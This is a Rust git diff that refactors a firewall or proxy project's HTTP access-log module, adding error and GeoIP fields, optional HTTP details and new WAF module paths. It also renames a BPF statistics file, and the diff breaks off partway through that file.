HttpDetails, + pub http: Option, pub network: NetworkDetails, pub tls: Option, pub response: ResponseDetails, + pub error: Option, pub remediation: Option, + pub geoip: Option, pub upstream: Option, pub performance: Option, } @@ -237,6 +241,28 @@ pub struct HttpDetails { pub body_truncated: bool, } +mod timestamp_format { + use chrono::{DateTime, SecondsFormat, Utc}; + use serde::{Deserialize, Deserializer, Serializer}; + + pub fn serialize(dt: &DateTime, serializer: S) -> Result + where + S: Serializer, + { + serializer.serialize_str(&dt.to_rfc3339_opts(SecondsFormat::Nanos, true)) + } + + pub fn deserialize<'de, D>(deserializer: D) -> Result, D::Error> + where + D: Deserializer<'de>, + { + let s = String::deserialize(deserializer)?; + DateTime::parse_from_rfc3339(&s) + .map(|dt| dt.with_timezone(&Utc)) + .map_err(serde::de::Error::custom) + } +} + #[derive(Debug, Clone, Serialize, Deserialize)] pub struct NetworkDetails { pub src_ip: String, @@ -275,6 +301,13 @@ pub struct ResponseDetails { pub body: String, } +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct ErrorDetails { + pub source: String, + pub error_type: String, + pub message: String, +} + #[derive(Debug, Clone, Serialize, Deserialize)] pub struct RemediationDetails { pub waf_action: Option, @@ -293,6 +326,16 @@ pub struct RemediationDetails { pub ip_asn_country: Option, } +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct GeoIpDetails { + pub country: String, + pub iso_code: String, + pub asn: u32, + pub asn_org: String, + pub asn_country: String, + pub ip_version: u8, +} + impl HttpAccessLog { /// Create access log from request parts and response data pub async fn create_from_parts( @@ -300,12 +343,15 @@ impl HttpAccessLog { req_body_bytes: &bytes::Bytes, peer_addr: SocketAddr, dst_addr: SocketAddr, - tls_fingerprint: Option<&crate::ja4_plus::Ja4hFingerprint>, + tls_present: bool, + http_valid: bool, + _tls_fingerprint: Option<&crate::utils::fingerprint::ja4_plus::Ja4hFingerprint>, tcp_fingerprint_data: Option<&TcpFingerprintData>, server_cert_info: Option<&ServerCertInfo>, response_data: ResponseData, - waf_result: Option<&crate::waf::wirefilter::WafResult>, - threat_data: Option<&crate::threat::ThreatResponse>, + error_details: Option, + waf_result: Option<&crate::security::waf::wirefilter::WafResult>, + threat_data: Option<&crate::security::waf::threat::ThreatResponse>, upstream_info: Option, performance_info: Option, tls_sni: Option, @@ -315,145 +361,163 @@ impl HttpAccessLog { tls_ja4_unsorted: Option, ) -> Result<(), Box> { let timestamp = Utc::now(); - let request_id = format!("req_{}", SystemTime::now().duration_since(UNIX_EPOCH).unwrap().as_nanos()); + let request_id = format!( + "req_{}", + SystemTime::now() + .duration_since(UNIX_EPOCH) + .unwrap() + .as_nanos() + ); - // Extract request details - let uri = &req_parts.uri; - let method = req_parts.method.to_string(); + let (http_details, ja4t) = if http_valid { + // Extract request details + let uri = &req_parts.uri; + let method = req_parts.method.to_string(); - // Determine scheme: prefer URI scheme, fallback to TLS fingerprint presence, then default to http - let scheme = uri.scheme().map(|s| s.to_string()).unwrap_or_else(|| { - if tls_fingerprint.is_some() { + // Determine scheme: use actual TLS presence only + let scheme = if tls_present { "https".to_string() } else { "http".to_string() - } - }); - - // Extract host from URI, fallback to Host header if URI doesn't have host - let host = uri.host().map(|h| h.to_string()).unwrap_or_else(|| { - req_parts.headers - .get("host") - .and_then(|h| h.to_str().ok()) - .map(|h| h.split(':').next().unwrap_or(h).to_string()) - .unwrap_or_else(|| "unknown".to_string()) - }); - - // Determine port: prefer URI port, fallback to scheme-based default - let port = uri.port_u16().unwrap_or(if scheme == "https" { 443 } else { 80 }); - let path = uri.path().to_string(); - let query = uri.query().unwrap_or("").to_string(); - - // Process headers - let mut headers = HashMap::new(); - let mut user_agent = None; - let mut content_type = None; - - for (name, value) in req_parts.headers.iter() { - let key = name.to_string(); - let val = value.to_str().unwrap_or("").to_string(); - headers.insert(key, val.clone()); - - if name.as_str().to_lowercase() == "user-agent" { - user_agent = Some(val.clone()); - } - if name.as_str().to_lowercase() == "content-type" { - content_type = Some(val); - } - } - - // Generate JA4H fingerprint - let ja4h_fp = Ja4hFingerprint::from_http_request( - req_parts.method.as_str(), - &format!("{:?}", req_parts.version), - &req_parts.headers - ); - - // Get log sender configuration for body processing - let log_config = { - let config_store = get_log_sender_config(); - let config_guard = config_store.read().unwrap(); - config_guard.as_ref().cloned() - }; + }; - // Process request body with truncation - respect include_request_body setting - let (body_str, body_sha256, body_truncated) = if let Some(config) = &log_config { - if !config.include_request_body { - // Request body logging disabled - ("".to_string(), "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855".to_string(), false) + // Extract host from URI, fallback to Host header if URI doesn't have host + let host = uri.host().map(|h| h.to_string()).unwrap_or_else(|| { + req_parts + .headers + .get("host") + .and_then(|h| h.to_str().ok()) + .map(|h| h.split(':').next().unwrap_or(h).to_string()) + .unwrap_or_else(|| "unknown".to_string()) + }); + + // Determine port: use destination port if known, otherwise URI port if present + let port = if dst_addr.port() != 0 { + dst_addr.port() } else { - let max_body_size = config.max_body_size; - let truncated = req_body_bytes.len() > max_body_size; - let truncated_body_bytes = if truncated { - req_body_bytes.slice(..max_body_size) - } else { - req_body_bytes.clone() - }; - let body = String::from_utf8_lossy(&truncated_body_bytes).to_string(); + uri.port_u16().unwrap_or(0) + }; + let path = uri.path().to_string(); + let query = uri.query().unwrap_or("").to_string(); - // Calculate SHA256 hash - handle empty body explicitly - let hash = if req_body_bytes.is_empty() { - "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855".to_string() - } else { - format!("{:x}", Sha256::digest(req_body_bytes)) - }; + // Process headers + let mut headers = HashMap::new(); + let mut user_agent = None; + let mut content_type = None; + + for (name, value) in req_parts.headers.iter() { + let key = name.to_string(); + let val = value.to_str().unwrap_or("").to_string(); + headers.insert(key, val.clone()); - (body, hash, truncated) + if name.as_str().to_lowercase() == "user-agent" { + user_agent = Some(val.clone()); + } + if name.as_str().to_lowercase() == "content-type" { + content_type = Some(val); + } } - } else { - // No config, default to disabled - ("".to_string(), "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855".to_string(), false) - }; - // Generate JA4T from TCP fingerprint data if available - let ja4t = tcp_fingerprint_data.map(|tcp_data| { - let ja4t_fp = Ja4tFingerprint::from_tcp_data( - tcp_data.window_size, - tcp_data.ttl, - tcp_data.mss, - tcp_data.window_scale, - &tcp_data.options, + // Generate JA4H fingerprint + let ja4h_fp = Ja4hFingerprint::from_http_request( + req_parts.method.as_str(), + &format!("{:?}", req_parts.version), + &req_parts.headers, ); - ja4t_fp.fingerprint - }); - // Process TLS details - let tls_details = if let Some(fp) = tls_fingerprint { - // Use actual TLS version from fingerprint if available, otherwise infer from HTTP version - let tls_version = if scheme == "https" { - // Check if version looks like TLS version (e.g., "TLS 1.2", "TLS 1.3") - if fp.version.starts_with("TLS") { - fp.version.clone() + // Get log sender configuration for body processing + let log_config = { + let config_store = get_log_sender_config(); + let config_guard = config_store.read().unwrap(); + config_guard.as_ref().cloned() + }; + + // Process request body with truncation - respect include_request_body setting + let (body_str, body_sha256, body_truncated) = if let Some(config) = &log_config { + if !config.include_request_body { + // Request body logging disabled + ( + "".to_string(), + "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" + .to_string(), + false, + ) } else { - // Otherwise infer from HTTP version - match fp.version.as_str() { - "2.0" | "2" => "TLS 1.2".to_string(), // HTTP/2 typically uses TLS 1.2+ - "3.0" | "3" => "TLS 1.3".to_string(), // HTTP/3 uses TLS 1.3 - _ => "TLS 1.2".to_string(), // Default for HTTPS - } + let max_body_size = config.max_body_size; + let truncated = req_body_bytes.len() > max_body_size; + let truncated_body_bytes = if truncated { + req_body_bytes.slice(..max_body_size) + } else { + req_body_bytes.clone() + }; + let body = String::from_utf8_lossy(&truncated_body_bytes).to_string(); + + // Calculate SHA256 hash - handle empty body explicitly + let hash = if req_body_bytes.is_empty() { + "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" + .to_string() + } else { + format!("{:x}", Sha256::digest(req_body_bytes)) + }; + + (body, hash, truncated) } } else { - "".to_string() // No TLS for HTTP + // No config, default to disabled + ( + "".to_string(), + "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855".to_string(), + false, + ) }; - // Determine cipher - use provided cipher or infer from TLS version - let cipher = if let Some(ref provided_cipher) = tls_cipher { - provided_cipher.clone() - } else if scheme == "https" { - match fp.version.as_str() { - "3.0" | "3" => "TLS_AES_256_GCM_SHA384".to_string(), // HTTP/3 uses TLS 1.3 - "2.0" | "2" => "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384".to_string(), // HTTP/2 typically uses TLS 1.2 - _ => "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384".to_string(), // Default TLS 1.2 cipher - } - } else { - "".to_string() // No cipher for HTTP + // Generate JA4T from TCP fingerprint data if available + let ja4t = tcp_fingerprint_data.map(|tcp_data| { + let ja4t_fp = Ja4tFingerprint::from_tcp_data( + tcp_data.window_size, + tcp_data.ttl, + tcp_data.mss, + tcp_data.window_scale, + &tcp_data.options, + ); + ja4t_fp.fingerprint + }); + + let http_details = HttpDetails { + method, + scheme, + host, + port, + path, + query: query.clone(), + query_hash: if query.is_empty() { + None + } else { + Some(format!("{:x}", Sha256::digest(query.as_bytes()))) + }, + headers, + ja4h: Some(ja4h_fp.fingerprint.clone()), + user_agent, + content_type, + content_length: Some(req_body_bytes.len() as u64), + body: body_str, + body_sha256, + body_truncated, }; - // Extract server certificate details if available - let server_cert = extract_server_cert_details(server_cert_info); + (Some(http_details), ja4t) + } else { + (None, None) + }; - // Extract JA4 from TLS fingerprint data - use tls_ja4 if available + // Process TLS details (no inference; only factual data) + let tls_details = if tls_present { + // Use empty string as default since we don't have version from the new parameters + let tls_version = String::new(); + let cipher = tls_cipher.clone().unwrap_or_default(); + let server_cert = extract_server_cert_details(server_cert_info); let ja4_value = tls_ja4.clone(); + let ja4_unsorted_value = tls_ja4_unsorted.clone(); Some(TlsDetails { version: tls_version, @@ -461,21 +525,7 @@ impl HttpAccessLog { alpn: tls_alpn.clone(), sni: tls_sni.clone(), ja4: ja4_value, - ja4_unsorted: tls_ja4_unsorted.clone(), - ja4t: ja4t.clone(), - server_cert, - }) - } else if scheme == "https" { - // Create minimal TLS details for HTTPS connections without fingerprint (e.g., PROXY protocol) - let server_cert = extract_server_cert_details(server_cert_info); - - Some(TlsDetails { - version: "TLS 1.3".to_string(), - cipher: "TLS_AES_256_GCM_SHA384".to_string(), - alpn: None, - sni: None, - ja4: Some("t13d".to_string()), - ja4_unsorted: Some("t13d".to_string()), + ja4_unsorted: ja4_unsorted_value, ja4t: ja4t.clone(), server_cert, }) @@ -483,25 +533,6 @@ impl HttpAccessLog { None }; - // Create HTTP details - let http_details = HttpDetails { - method, - scheme, - host, - port, - path, - query: query.clone(), - query_hash: if query.is_empty() { None } else { Some(format!("{:x}", Sha256::digest(query.as_bytes()))) }, - headers, - ja4h: Some(ja4h_fp.fingerprint.clone()), - user_agent, - content_type, - content_length: Some(req_body_bytes.len() as u64), - body: body_str, - body_sha256, - body_truncated, - }; - // Create network details let network_details = NetworkDetails { src_ip: peer_addr.ip().to_string(), @@ -513,14 +544,27 @@ impl HttpAccessLog { // Create response details from response_data - response body logging disabled let response_details = ResponseDetails { status: response_data.response_json["status"].as_u64().unwrap_or(0) as u16, - status_text: response_data.response_json["status_text"].as_str().unwrap_or("Unknown").to_string(), - content_type: response_data.response_json["content_type"].as_str().map(|s| s.to_string()), + status_text: response_data.response_json["status_text"] + .as_str() + .unwrap_or("Unknown") + .to_string(), + content_type: response_data.response_json["content_type"] + .as_str() + .map(|s| s.to_string()), content_length: response_data.response_json["content_length"].as_u64(), body: "".to_string(), }; // Create remediation details let remediation_details = Self::create_remediation_details(waf_result, threat_data); + let geoip_details = threat_data.map(|threat| GeoIpDetails { + country: threat.context.geo.country.clone(), + iso_code: threat.context.geo.iso_code.clone(), + asn: threat.context.asn, + asn_org: threat.context.org.clone(), + asn_country: threat.context.geo.asn_iso_code.clone(), + ip_version: threat.context.ip_version, + }); // Create the access log let access_log = HttpAccessLog { @@ -532,7 +576,9 @@ impl HttpAccessLog { network: network_details, tls: tls_details, response: response_details, + error: error_details, remediation: remediation_details, + geoip: geoip_details, upstream: upstream_info, performance: performance_info, }; @@ -550,28 +596,30 @@ impl HttpAccessLog { /// Create remediation details from WAF result and threat intelligence data fn create_remediation_details( - waf_result: Option<&crate::waf::wirefilter::WafResult>, - threat_data: Option<&crate::threat::ThreatResponse>, + waf_result: Option<&crate::security::waf::wirefilter::WafResult>, + threat_data: Option<&crate::security::waf::threat::ThreatResponse>, ) -> Option { // Check if WAF action requires remediation (Block/Challenge/RateLimit) - these will populate WAF fields // RateLimit is included because it blocks requests when the limit is exceeded let has_waf_remediation = match waf_result { Some(waf) => matches!( waf.action, - crate::waf::wirefilter::WafAction::Block - | crate::waf::wirefilter::WafAction::Challenge - | crate::waf::wirefilter::WafAction::RateLimit + crate::security::waf::wirefilter::WafAction::Block + | crate::security::waf::wirefilter::WafAction::Challenge + | crate::security::waf::wirefilter::WafAction::RateLimit ), None => false, }; // Check if threat data is meaningful (not just default/empty values) - let has_meaningful_threat_data = threat_data.map(|threat| { - threat.intel.score > 0 - || threat.intel.reason_code != "NO_DATA" - || !threat.intel.categories.is_empty() - || !threat.intel.tags.is_empty() - }).unwrap_or(false); + let has_meaningful_threat_data = threat_data + .map(|threat| { + threat.intel.score > 0 + || threat.intel.reason_code != "NO_DATA" + || !threat.intel.categories.is_empty() + || !threat.intel.tags.is_empty() + }) + .unwrap_or(false); // Create remediation section if: // 1. WAF action is Block/Challenge/RateLimit (will populate WAF fields), OR @@ -607,14 +655,14 @@ impl HttpAccessLog { // Include WAF data in remediation for Block, Challenge, and RateLimit actions // RateLimit is included because it blocks requests when the limit is exceeded match waf.action { - crate::waf::wirefilter::WafAction::Block - | crate::waf::wirefilter::WafAction::Challenge - | crate::waf::wirefilter::WafAction::RateLimit => { + crate::security::waf::wirefilter::WafAction::Block + | crate::security::waf::wirefilter::WafAction::Challenge + | crate::security::waf::wirefilter::WafAction::RateLimit => { remediation.waf_action = Some(format!("{:?}", waf.action).to_lowercase()); remediation.waf_rule_id = Some(waf.rule_id.clone()); remediation.waf_rule_name = Some(waf.rule_name.clone()); } - crate::waf::wirefilter::WafAction::Allow => { + crate::security::waf::wirefilter::WafAction::Allow => { // Allow actions don't populate WAF fields // But remediation section may still exist if there's meaningful threat data } @@ -645,7 +693,8 @@ impl HttpAccessLog { // Only return remediation if it has any meaningful data (WAF fields for Block/Challenge, meaningful threat data, or GeoIP data) let has_waf_data = remediation.waf_action.is_some(); - let has_threat_data = remediation.threat_score.is_some() || remediation.threat_reason_code.is_some(); + let has_threat_data = + remediation.threat_score.is_some() || remediation.threat_reason_code.is_some(); let has_geoip_data = remediation.ip_country.is_some() || remediation.ip_asn.is_some(); if has_waf_data || has_threat_data || has_geoip_data { @@ -661,15 +710,20 @@ impl HttpAccessLog { pub fn log_to_stdout(&self) -> Result<(), Box> { let json = self.to_json()?; - log::info!("{}", json); + // Use the "access_log" target to route to separate file when file logging is enabled + // When file logging is disabled, this behaves like a normal log::info! + log::info!(target: "access_log", "{}", json); Ok(()) } /// Create a lightweight summary suitable for returning with responses pub fn to_summary(&self) -> AccessLogSummary { let waf_info = if let Some(remediation) = &self.remediation { - if let (Some(action), Some(rule_id), Some(rule_name)) = - (&remediation.waf_action, &remediation.waf_rule_id, &remediation.waf_rule_name) { + if let (Some(action), Some(rule_id), Some(rule_name)) = ( + &remediation.waf_action, + &remediation.waf_rule_id, + &remediation.waf_rule_name, + ) { Some(WafInfo { action: action.clone(), rule_id: rule_id.clone(), @@ -684,12 +738,16 @@ impl HttpAccessLog { let threat_info = if let Some(remediation) = &self.remediation { if let (Some(score), Some(confidence)) = - (remediation.threat_score, remediation.threat_confidence) { + (remediation.threat_score, remediation.threat_confidence) + { Some(ThreatInfo { score, confidence, categories: remediation.threat_categories.clone().unwrap_or_default(), - reason: remediation.threat_reason_summary.clone().unwrap_or_default(), + reason: remediation + .threat_reason_summary + .clone() + .unwrap_or_default(), country: remediation.ip_country.clone(), asn: remediation.ip_asn, }) @@ -701,10 +759,22 @@ impl HttpAccessLog { }; let protocol = if self.tls.is_some() { - format!("{} over {}", self.http.scheme, - self.tls.as_ref().map(|t| t.version.as_str()).unwrap_or("TLS")) + if let Some(http) = &self.http { + format!( + "{} over {}", + http.scheme, + self.tls + .as_ref() + .map(|t| t.version.as_str()) + .unwrap_or("TLS") + ) + } else { + "unknown".to_string() + } + } else if let Some(http) = &self.http { + http.scheme.clone() } else { - self.http.scheme.clone() + "unknown".to_string() }; AccessLogSummary { @@ -743,18 +813,21 @@ impl HttpAccessLog { pub struct ResponseData { pub response_json: serde_json::Value, pub blocking_info: Option, - pub waf_result: Option, - pub threat_data: Option, + pub waf_result: Option, + pub threat_data: Option, } impl ResponseData { /// Create response data for a regular response - pub async fn from_response(response: Response>) -> Result> { + pub async fn from_response( + response: Response>, + ) -> Result> { let (response_parts, response_body) = response.into_parts(); let response_body_bytes = response_body.collect().await?.to_bytes(); let response_body_str = String::from_utf8_lossy(&response_body_bytes).to_string(); - let response_content_type = response_parts.headers + let response_content_type = response_parts + .headers .get("content-type") .and_then(|h| h.to_str().ok()) .map(|s| s.to_string()); @@ -779,14 +852,14 @@ impl ResponseData { pub fn for_blocked_request( block_reason: &str, status_code: u16, - waf_result: Option, - threat_data: Option<&crate::threat::ThreatResponse>, + waf_result: Option, + threat_data: Option<&crate::security::waf::threat::ThreatResponse>, ) -> Self { let status_text = match status_code { 403 => "Forbidden", 426 => "Upgrade Required", 429 => "Too Many Requests", - _ => "Blocked" + _ => "Blocked", }; let response_json = serde_json::json!({ @@ -815,8 +888,8 @@ impl ResponseData { pub fn for_malware_blocked_request( signature: Option, scan_error: Option, - waf_result: Option, - threat_data: Option<&crate::threat::ThreatResponse>, + waf_result: Option, + threat_data: Option<&crate::security::waf::threat::ThreatResponse>, ) -> Self { let response_json = serde_json::json!({ "status": 403, @@ -850,9 +923,10 @@ impl ResponseData { } } - /// Extract server certificate details from server certificate info -fn extract_server_cert_details(server_cert_info: Option<&ServerCertInfo>) -> Option { +fn extract_server_cert_details( + server_cert_info: Option<&ServerCertInfo>, +) -> Option { server_cert_info.map(|cert_info| { // Parse the date strings from ServerCertInfo let not_before = chrono::DateTime::parse_from_rfc3339(&cert_info.not_before) @@ -872,6 +946,7 @@ fn extract_server_cert_details(server_cert_info: Option<&ServerCertInfo>) -> Opt }) } +// Function removed - format_tls_version was unused after removing tls_digest parameter #[cfg(test)] mod tests { @@ -884,7 +959,10 @@ mod tests { let _req = Request::builder() .method("GET") .uri("https://example.com/test?param=value") - .header("User-Agent", format!("TestAgent/{}", env!("CARGO_PKG_VERSION"))) + .header( + "User-Agent", + format!("TestAgent/{}", env!("CARGO_PKG_VERSION")), + ) .body(Full::new(bytes::Bytes::new())) .unwrap(); @@ -905,7 +983,7 @@ mod tests { schema_version: "1.0.0".to_string(), timestamp: Utc::now(), request_id: "test_123".to_string(), - http: HttpDetails { + http: Some(HttpDetails { method: "GET".to_string(), scheme: "https".to_string(), host: "example.com".to_string(), @@ -921,7 +999,7 @@ mod tests { body: "".to_string(), body_sha256: "abc123".to_string(), body_truncated: false, - }, + }), network: NetworkDetails { src_ip: "127.0.0.1".to_string(), src_port: 12345, @@ -936,7 +1014,9 @@ mod tests { content_length: Some(10), body: "{\"ok\":true}".to_string(), }, + error: None, remediation: None, + geoip: None, upstream: Some(UpstreamInfo { selected: "backend1".to_string(), method: "round_robin".to_string(), @@ -963,8 +1043,9 @@ mod tests { #[test] fn test_remediation_with_threat_intelligence() { - use crate::waf::wirefilter::{WafAction, WafResult}; - use crate::threat::{ThreatResponse, ThreatIntel, ThreatContext, GeoInfo}; + use crate::security::waf::geoip::GeoInfo; + use crate::security::waf::threat::{ThreatContext, ThreatIntel, ThreatResponse}; + use crate::security::waf::wirefilter::{WafAction, WafResult}; // Create a mock threat response let threat_response = ThreatResponse { @@ -1009,27 +1090,46 @@ mod tests { }; // Test create_remediation_details with threat intelligence - let remediation = HttpAccessLog::create_remediation_details( - Some(&waf_result), - Some(&threat_response), - ); + let remediation = + HttpAccessLog::create_remediation_details(Some(&waf_result), Some(&threat_response)); assert!(remediation.is_some()); let remediation = remediation.unwrap(); // Verify WAF data assert_eq!(remediation.waf_action, Some("block".to_string())); - assert_eq!(remediation.waf_rule_id, Some("aa0880fd-4d3a-41a6-a02b-9b8b83ca615a".to_string())); - assert_eq!(remediation.waf_rule_name, Some("Threat intelligence - Block".to_string())); + assert_eq!( + remediation.waf_rule_id, + Some("aa0880fd-4d3a-41a6-a02b-9b8b83ca615a".to_string()) + ); + assert_eq!( + remediation.waf_rule_name, + Some("Threat intelligence - Block".to_string()) + ); // Verify threat intelligence data assert_eq!(remediation.threat_score, Some(85)); assert_eq!(remediation.threat_confidence, Some(0.95)); - assert_eq!(remediation.threat_categories, Some(vec!["malware".to_string(), "botnet".to_string()])); - assert_eq!(remediation.threat_tags, Some(vec!["suspicious".to_string()])); - assert_eq!(remediation.threat_reason_code, Some("THREAT_DETECTED".to_string())); - assert_eq!(remediation.threat_reason_summary, Some("IP address associated with malicious activity".to_string())); - assert_eq!(remediation.threat_advice, Some("Block this IP address".to_string())); + assert_eq!( + remediation.threat_categories, + Some(vec!["malware".to_string(), "botnet".to_string()]) + ); + assert_eq!( + remediation.threat_tags, + Some(vec!["suspicious".to_string()]) + ); + assert_eq!( + remediation.threat_reason_code, + Some("THREAT_DETECTED".to_string()) + ); + assert_eq!( + remediation.threat_reason_summary, + Some("IP address associated with malicious activity".to_string()) + ); + assert_eq!( + remediation.threat_advice, + Some("Block this IP address".to_string()) + ); assert_eq!(remediation.ip_country, Some("US".to_string())); assert_eq!(remediation.ip_asn, Some(12345)); assert_eq!(remediation.ip_asn_org, Some("Test ISP".to_string())); @@ -1038,8 +1138,9 @@ mod tests { #[test] fn test_remediation_with_waf_challenge_and_threat_intelligence() { - use crate::waf::wirefilter::{WafAction, WafResult}; - use crate::threat::{ThreatResponse, ThreatIntel, ThreatContext, GeoInfo}; + use crate::security::waf::geoip::GeoInfo; + use crate::security::waf::threat::{ThreatContext, ThreatIntel, ThreatResponse}; + use crate::security::waf::wirefilter::{WafAction, WafResult}; // Create a mock threat response let threat_response = ThreatResponse { @@ -1084,30 +1185,37 @@ mod tests { }; // Test create_remediation_details with challenge action and threat intelligence - let remediation = HttpAccessLog::create_remediation_details( - Some(&waf_result), - Some(&threat_response), - ); + let remediation = + HttpAccessLog::create_remediation_details(Some(&waf_result), Some(&threat_response)); assert!(remediation.is_some()); let remediation = remediation.unwrap(); // Verify WAF data (challenge should be included in remediation) assert_eq!(remediation.waf_action, Some("challenge".to_string())); - assert_eq!(remediation.waf_rule_id, Some("1eb12716-6e13-4e23-a1d9-c879f6175317".to_string())); - assert_eq!(remediation.waf_rule_name, Some("Threat intelligence - Challenge".to_string())); + assert_eq!( + remediation.waf_rule_id, + Some("1eb12716-6e13-4e23-a1d9-c879f6175317".to_string()) + ); + assert_eq!( + remediation.waf_rule_name, + Some("Threat intelligence - Challenge".to_string()) + ); // Verify threat intelligence data assert_eq!(remediation.threat_score, Some(60)); assert_eq!(remediation.threat_confidence, Some(0.75)); - assert_eq!(remediation.threat_categories, Some(vec!["suspicious".to_string()])); + assert_eq!( + remediation.threat_categories, + Some(vec!["suspicious".to_string()]) + ); assert_eq!(remediation.ip_country, Some("CA".to_string())); assert_eq!(remediation.ip_asn, Some(67890)); } #[test] fn test_remediation_without_threat_intelligence() { - use crate::waf::wirefilter::{WafAction, WafResult}; + use crate::security::waf::wirefilter::{WafAction, WafResult}; // Create a WAF result without threat intelligence let waf_result = WafResult { @@ -1119,10 +1227,7 @@ mod tests { }; // Test create_remediation_details without threat intelligence - let remediation = HttpAccessLog::create_remediation_details( - Some(&waf_result), - None, - ); + let remediation = HttpAccessLog::create_remediation_details(Some(&waf_result), None); assert!(remediation.is_some()); let remediation = remediation.unwrap(); @@ -1141,8 +1246,9 @@ mod tests { #[test] fn test_remediation_json_serialization_with_threat_intelligence() { - use crate::waf::wirefilter::{WafAction, WafResult}; - use crate::threat::{ThreatResponse, ThreatIntel, ThreatContext, GeoInfo}; + use crate::security::waf::geoip::GeoInfo; + use crate::security::waf::threat::{ThreatContext, ThreatIntel, ThreatResponse}; + use crate::security::waf::wirefilter::{WafAction, WafResult}; // Create a mock threat response let threat_response = ThreatResponse { @@ -1185,10 +1291,9 @@ mod tests { threat_response: Some(threat_response.clone()), }; - let remediation = HttpAccessLog::create_remediation_details( - Some(&waf_result), - Some(&threat_response), - ).unwrap(); + let remediation = + HttpAccessLog::create_remediation_details(Some(&waf_result), Some(&threat_response)) + .unwrap(); // Create a full access log with remediation let access_log = HttpAccessLog { @@ -1196,7 +1301,7 @@ mod tests { schema_version: "1.0.0".to_string(), timestamp: Utc::now(), request_id: "test_req_123".to_string(), - http: HttpDetails { + http: Some(HttpDetails { method: "GET".to_string(), scheme: "https".to_string(), host: "example.com".to_string(), @@ -1210,9 +1315,10 @@ mod tests { content_type: None, content_length: None, body: "".to_string(), - body_sha256: "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855".to_string(), + body_sha256: "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" + .to_string(), body_truncated: false, - }, + }), network: NetworkDetails { src_ip: "192.168.1.100".to_string(), src_port: 12345, @@ -1227,7 +1333,9 @@ mod tests { content_length: None, body: "".to_string(), }, + error: None, remediation: Some(remediation), + geoip: None, upstream: None, performance: None, }; diff --git a/src/bpf_stats.rs b/src/logger/bpf_stats.rs similarity index 78% rename from src/bpf_stats.rs rename to src/logger/bpf_stats.rs index 6c3f88b..333b514 100644 --- a/src/bpf_stats.rs +++ b/src/logger/bpf_stats.rs @@ -1,12 +1,12 @@ -use std::sync::Arc; -use serde::{Deserialize, Serialize}; +use crate::worker::log::{UnifiedEvent, send_event}; use chrono::{DateTime, Utc}; +use libbpf_rs::MapCore; +use serde::{Deserialize, Serialize}; use std::collections::HashMap; use std::net::{Ipv4Addr, Ipv6Addr}; -use libbpf_rs::MapCore; -use crate::worker::log::{send_event, UnifiedEvent}; +use std::sync::Arc; -use crate::bpf::FilterSkel; +use crate::security::firewall::bpf::FilterSkel; /// BPF statistics collected from kernel-level access rule enforcement #[derive(Debug, Clone, Serialize, Deserialize)] @@ -27,8 +27,8 @@ pub struct BpfAccessStats { /// Statistics about dropped IP addresses #[derive(Debug, Clone, Serialize, Deserialize)] pub struct DroppedIpAddresses { - pub ipv4_addresses: HashMap, // IP address -> drop count - pub ipv6_addresses: HashMap, // IP address -> drop count + pub ipv4_addresses: HashMap, // IP address -> drop count + pub ipv6_addresses: HashMap, // IP address -> drop count pub total_unique_dropped_ips: u64, } @@ -40,7 +40,7 @@ pub struct DroppedIpEvent { pub ip_address: String, pub ip_version: IpVersion, pub drop_count: u64, - pub drop_reason: DropReason + pub drop_reason: DropReason, } /// IP version enumeration @@ -77,11 +77,15 @@ impl BpfAccessStats { let total_packets_processed = Self::read_bpf_counter(&skel.maps.total_packets_processed)?; let total_packets_dropped = Self::read_bpf_counter(&skel.maps.total_packets_dropped)?; let ipv4_banned_hits = Self::read_bpf_counter(&skel.maps.ipv4_banned_stats)?; - let ipv4_recently_banned_hits = Self::read_bpf_counter(&skel.maps.ipv4_recently_banned_stats)?; + let ipv4_recently_banned_hits = + Self::read_bpf_counter(&skel.maps.ipv4_recently_banned_stats)?; let ipv6_banned_hits = Self::read_bpf_counter(&skel.maps.ipv6_banned_stats)?; - let ipv6_recently_banned_hits = Self::read_bpf_counter(&skel.maps.ipv6_recently_banned_stats)?; - let tcp_fingerprint_blocks_ipv4 = Self::read_bpf_counter(&skel.maps.tcp_fingerprint_blocks_ipv4)?; - let tcp_fingerprint_blocks_ipv6 = Self::read_bpf_counter(&skel.maps.tcp_fingerprint_blocks_ipv6)?; + let ipv6_recently_banned_hits = + Self::read_bpf_counter(&skel.maps.ipv6_recently_banned_stats)?; + let tcp_fingerprint_blocks_ipv4 = + Self::read_bpf_counter(&skel.maps.tcp_fingerprint_blocks_ipv4)?; + let tcp_fingerprint_blocks_ipv6 = + Self::read_bpf_counter(&skel.maps.tcp_fingerprint_blocks_ipv6)?; // Collect dropped IP addresses let dropped_ip_addresses = Self::collect_dropped_ip_addresses(skel)?; @@ -114,8 +118,14 @@ impl BpfAccessStats { if let Some(value_bytes) = map.lookup(&key, libbpf_rs::MapFlags::ANY)? { if value_bytes.len() >= 8 { let value = u64::from_le_bytes([ - value_bytes[0], value_bytes[1], value_bytes[2], value_bytes[3], - value_bytes[4], value_bytes[5], value_bytes[6], value_bytes[7], + value_bytes[0], + value_bytes[1], + value_bytes[2], + value_bytes[3], + value_bytes[4], + value_bytes[5], + value_bytes[6], + value_bytes[7], ]); Ok(value) } else { @@ -127,7 +137,9 @@ impl BpfAccessStats { } /// Collect dropped IP addresses from BPF maps - fn collect_dropped_ip_addresses(skel: &FilterSkel) -> Result> { + fn collect_dropped_ip_addresses( + skel: &FilterSkel, + ) -> Result> { let mut ipv4_addresses = HashMap::new(); let mut ipv6_addresses = HashMap::new(); @@ -136,43 +148,71 @@ impl BpfAccessStats { // Try batch lookup first, fall back to keys iterator if empty log::debug!("Reading IPv4 dropped addresses from BPF map"); let mut count = 0; - + // First try lookup_batch let mut batch_worked = false; - if let Ok(batch_iter) = skel.maps.dropped_ipv4_addresses.lookup_batch(1000, libbpf_rs::MapFlags::ANY, 